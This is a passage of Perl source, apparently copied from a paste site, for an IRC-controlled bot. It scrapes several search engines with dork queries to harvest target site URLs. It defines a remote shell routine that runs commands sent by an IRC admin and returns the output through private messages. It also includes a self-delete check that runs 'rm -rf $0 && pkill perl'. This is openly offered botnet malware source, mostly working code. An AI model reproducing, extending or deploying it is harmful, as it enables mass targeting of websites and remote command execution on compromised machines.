- my @grep = links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub uol() {
- my @list;
- my $key = $_[0];
- for (my $i=1; $i<=1000; $i+=10) {
- my $search = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&start=".$i);
- my $res = search_engine_query($search);
- while ($res =~ m/<a href=\"http:\/\/([^>\"]*)/g) {
- my $link = $1;
- if ($link !~ /busca|uol|yahoo/) {
- my @grep = links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub bing() {
- my @list;
- my $key = $_[0];
- for (my $i=1; $i<=1000; $i+=10) {
- my $search = ("http://www.bing.com/search?q=".key($key)."&filt=all&first=".$i."&FORM=PERE");
- my $res = search_engine_query($search);
- while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
- my $link = $1;
- if ($link !~ /msn|live|bing/) {
- my @grep = links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub altavista() {
- my @list;
- my $key = $_[0];
- for (my $i=1; $i<=1000; $i+=10){
- my $search = ("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$i);
- my $res = search_engine_query($search);
- while ($res =~ m/<span class=ngrn>(.+?)\//g) {
- my $link = $1;
- if ($link !~ /altavista/){
- $link =~ s/<//g;
- $link =~ s/ //g;
- my @grep = links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub ask() {
- my @list;
- my $key = $_[0];
- for (my $i=0; $i<=1000; $i+=10) {
- my $search = ("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=EE90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$i);
- my $res = search_engine_query($search);
- while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) {
- my $link = $1;
- if ($link !~ /ask\.com/){
- my @grep = links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- sub yahoo() {
- my @list;
- my $key = $_[0];
- for (my $i=1; $i<=500; $i+=1) {
- my $search = ("http://www.search.yahoo.com/search?p=".key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$i);
- my $res = search_engine_query($search);
- while ($res =~ m/26u=(.*?)%26w=/g) {
- my $link = $1;
- if ($link!~ /yahoo/){
- my @grep = links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
- #########################################
- sub clean() {
- my @cln = ();
- my %visit = ();
- foreach my $element (@_) {
- $element =~ s/\/+/\//g;
- next if $visit{$element}++;
- push @cln, $element;
- }
- return @cln;
- }
- sub key() {
- my $dork = $_[0];
- $dork =~ s/ /\+/g;
- $dork =~ s/:/\%3A/g;
- $dork =~ s/\//\%2F/g;
- $dork =~ s/\?/\%3F/g;
- $dork =~ s/&/\%26/g;
- $dork =~ s/\"/\%22/g;
- $dork =~ s/,/\%2C/g;
- $dork =~ s/\\/\%5C/g;
- $dork =~ s/@/\%40/g;
- $dork =~ s/\[/\%5B/g;
- $dork =~ s/\]/\%5D/g;
- $dork =~ s/\?/\%3F/g;
- $dork =~ s/\=/\%3D/g;
- $dork =~ s/\|/\%7C/g;
- return $dork;
- }
- sub links() {
- my @list;
- my $link = $_[0];
- my $host = $_[0];
- my $hdir = $_[0];
- $hdir =~ s/(.*)\/[^\/]*$/$1/;
- $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
- $host .= "/";
- $link .= "/";
- $hdir .= "/";
- $host =~ s/\/\//\//g;
- $hdir =~ s/\/\//\//g;
- $link =~ s/\/\//\//g;
- push(@list,$link,$host,$hdir);
- return @list;
- }
- sub search_engine_query($) {
- my $url = $_[0];
- $url =~ s/http:\/\///;
- my $host = $url;
- my $query = $url;
- my $page = "";
- $host =~ s/href=\"?http:\/\///;
- $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
- $query =~ s/$host//;
- if ($query eq "") { $query = "/"; }
- eval {
- my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
- print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n";
- my @pages = <$sock>;
- $page = "@pages";
- close($sock);
- };
- return $page;
- }
- #########################################
- sub shell() {
- my $path = $_[0];
- my $cmd = $_[1];
- if ($cmd =~ /cd (.*)/) {
- chdir("$1") || &msg("$path","4No such file or directory");
- return;
- }
- elsif ($pid = fork) { waitpid($pid, 0); }
- else { if (fork) { exit; } else {
- my @output = `$cmd 2>&1 3>&1`;
- my $c = 0;
- foreach my $output (@output) {
- $c++;
- chop $output;
- &msg("$path","$output");
- if ($c == 5) { $c = 0; sleep 2; }
- }
- exit;
- }}
- }
- sub isAdmin() {
- my $status = 0;
- my $nick = $_[0];
- if ($nick eq $admin) { $status = 1; }
- return $status;
- }
- sub msg() {
- return unless $#_ == 1;
- sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
- }
- sub SIGN() {
- if (($powered !~ /t/)||($mail !~ /bot/)) {
- print "\nLAMER DETECTED FVCK YOU. YOU NOT HACKER. U JUST SCRIPT KIDDIES\n\n";
- exec("rm -rf $0 && pkill perl");
- }
- }
- sub nick() {
- return unless $#_ == 0;
- sendraw("NICK $_[0]");
- }
- sub notice() {
- return unless $#_ == 1;
- sendraw("NOTICE $_[0] :$_[1]");
- }
Add Comment
Please, Sign In to add comment